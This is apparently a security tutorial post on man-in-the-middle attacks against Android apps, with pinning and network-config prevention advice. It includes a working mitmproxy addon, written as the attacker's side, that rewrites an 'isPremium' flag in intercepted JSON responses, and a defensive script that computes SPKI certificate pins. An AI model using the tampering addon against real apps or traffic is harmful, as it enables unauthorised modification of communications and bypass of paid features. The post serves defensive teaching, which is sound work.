🧠 What It Is:
In an active MITM attack, the attacker sits between two parties, reads their traffic and modifies it, without either party noticing.
For example, when your Android app talks to an API over plain HTTP (or HTTPS with broken validation, such as a trust-all TrustManager or a HostnameVerifier that always returns true), an attacker in the path can rewrite responses before the app ever sees them, e.g. turning {"isPremium": false} into {"isPremium": true}.
🛠️ How It Works:
- The attacker tricks the client (your app) into thinking it's talking to the server.
- And tricks the server into thinking it's talking to the client.
- Getting into the traffic path is usually done with:
  - Rogue Wi-Fi hotspots (e.g., in public coffee shops)
  - ARP spoofing on the local network
  - DNS poisoning
- Once in the path, an interception proxy like Burp Suite or mitmproxy terminates the connection, reads the traffic and rewrites it on the fly.
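Here is the rewrite described above as a mitmproxy addon, an added example that is not from the original post. It is the attacker's side: run with `mitmdump -s flip_premium.py` on the machine the phone is proxied through, it assumes the API host api.example.com and JSON responses (both assumptions). `tamper_body` does the actual modification and is kept pure so it can be tested on its own; the `response` hook wires it into mitmproxy, and the import is guarded so the file still loads where mitmproxy is not installed.

```python
import json

try:
    from mitmproxy import http  # only present when running under mitmproxy
except ImportError:  # lets the pure function be imported/tested without mitmproxy
    http = None

TARGET_HOST = "api.example.com"  # assumed API host for this example


def tamper_body(body: bytes) -> bytes:
    """Flip "isPremium": false to true in a JSON object body.

    Anything that is not JSON, not an object, or already premium is returned
    untouched, so the proxy stays transparent for every other response.
    """
    try:
        data = json.loads(body)
    except ValueError:  # json.JSONDecodeError is a ValueError
        return body
    if isinstance(data, dict) and data.get("isPremium") is False:
        data["isPremium"] = True
        return json.dumps(data).encode()
    return body


def response(flow) -> None:
    """mitmproxy hook: runs for every HTTP response passing through the proxy."""
    if flow.request.pretty_host != TARGET_HOST:
        return
    content_type = flow.response.headers.get("content-type", "")
    if content_type.startswith("application/json"):
        # Assigning .content re-computes Content-Length for us.
        flow.response.content = tamper_body(flow.response.content)
```

For this to work against a real app the device's traffic has to reach the proxy (Wi-Fi proxy setting, or the ARP/DNS tricks above) and, for HTTPS, the mitmproxy CA has to be trusted by the app, which is exactly what pinning and a strict network security config are meant to prevent.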
📱 How It Affects Android Apps:
- Apps without certificate pinning accept any chain the device trusts, so any CA the attacker can get trusted is enough.
- Even HTTPS can be intercepted if the attacker gets a root certificate trusted by the app. Since Android 7.0 (API 24) apps ignore user-installed CAs by default, but an app that opts in to the user store in its network security config, one that targets API 23 or lower, or a rooted device where the CA is pushed into the system store is still exposed.
- Debug builds are more vulnerable because debug network configs (a <debug-overrides> block trusting user CAs, or cleartext allowed for testing) are lax by design, and they are easy to ship by mistake.
✅ Prevention Tips:
- Use HTTPS only, and leave the platform's default certificate and hostname validation intact (no trust-all TrustManager, no custom HostnameVerifier that returns true).
- Implement certificate pinning using NetworkSecurityConfig (a <pin-set> in res/xml/network_security_config.xml) or libraries like OkHttp's CertificatePinner, and always include a backup pin so a key rotation doesn't lock users out.
- Don't ship debug configs in production APKs: keep user-CA trust inside <debug-overrides> (which only applies when android:debuggable is true) and set cleartextTrafficPermitted="false" in the base config.
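Both NetworkSecurityConfig's <pin digest="SHA-256"> element and OkHttp's CertificatePinner.add(host, "sha256/...") take the same value: the base64 SHA-256 of the server certificate's DER-encoded SubjectPublicKeyInfo. The script below, an added example and not part of the original post, pulls that SPKI out of a DER certificate with a minimal ASN.1 walker and prints the pin. In practice the input is the certificate you fetched with openssl s_client; here a constructed, unsigned placeholder certificate with dummy key bits is built inline (assumed host name api.example.com) so the script runs offline and the extraction can be checked.

```python
import base64
import hashlib


def _der(tag: int, content: bytes) -> bytes:
    """Encode one DER TLV (short or long definite-length form)."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def _read_tlv(buf: bytes, pos: int):
    """Decode the TLV header at buf[pos]; return (tag, value_start, value_end)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def _children(buf: bytes, start: int, end: int):
    """Yield (tag, raw_tlv_bytes) for each element of a constructed DER value."""
    pos = start
    while pos < end:
        tag, _, vend = _read_tlv(buf, pos)
        yield tag, buf[pos:vend]
        pos = vend


def extract_spki(cert_der: bytes) -> bytes:
    """Return the DER SubjectPublicKeyInfo (header included) of an X.509 certificate."""
    tag, cs, ce = _read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    # Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }
    _, tbs = next(_children(cert_der, cs, ce))
    _, ts, te = _read_tlv(tbs, 0)
    fields = list(_children(tbs, ts, te))
    # TBSCertificate may start with an OPTIONAL explicit [0] version (tag 0xA0).
    if fields and fields[0][0] == 0xA0:
        fields = fields[1:]
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, ...
    return fields[5][1]


def pin_from_spki(spki_der: bytes) -> str:
    """Pin format shared by NetworkSecurityConfig and OkHttp: sha256/<base64(SHA-256(SPKI))>."""
    return "sha256/" + base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def spki_pin(cert_der: bytes) -> str:
    return pin_from_spki(extract_spki(cert_der))


def sample_certificate(with_version: bool = True):
    """Constructed placeholder certificate (not a real cert): dummy RSA key bits and
    dummy signature, but structurally valid DER. Returns (cert_der, spki_der)."""
    rsa_oid = _der(0x06, bytes.fromhex("2A864886F70D010101"))     # 1.2.840.113549.1.1.1 rsaEncryption
    sha256_rsa = _der(0x06, bytes.fromhex("2A864886F70D01010B"))  # 1.2.840.113549.1.1.11
    null = _der(0x05, b"")
    sig_alg = _der(0x30, sha256_rsa + null)

    def name(cn: str) -> bytes:
        cn_oid = _der(0x06, bytes.fromhex("550403"))  # 2.5.4.3 commonName
        return _der(0x30, _der(0x31, _der(0x30, cn_oid + _der(0x0C, cn.encode()))))

    spki = _der(0x30, _der(0x30, rsa_oid + null) + _der(0x03, b"\x00" + b"\xAB" * 140))
    validity = _der(0x30, _der(0x17, b"240101000000Z") + _der(0x17, b"250101000000Z"))
    version = _der(0xA0, _der(0x02, b"\x02")) if with_version else b""
    tbs = _der(0x30, version + _der(0x02, b"\x01") + sig_alg + name("Test CA")
               + validity + name("api.example.com") + spki)
    cert = _der(0x30, tbs + sig_alg + _der(0x03, b"\x00" + b"\xCD" * 32))
    return cert, spki


if __name__ == "__main__":
    cert_der, _ = sample_certificate()
    print(spki_pin(cert_der))
```

Paste the printed value into `<pin digest="SHA-256">...</pin>` under `<pin-set>` for the domain in network_security_config.xml, or into `CertificatePinner.Builder().add("api.example.com", pin)`; run it a second time on the backup key's certificate and add that pin too, so rotating the server key doesn't lock users out.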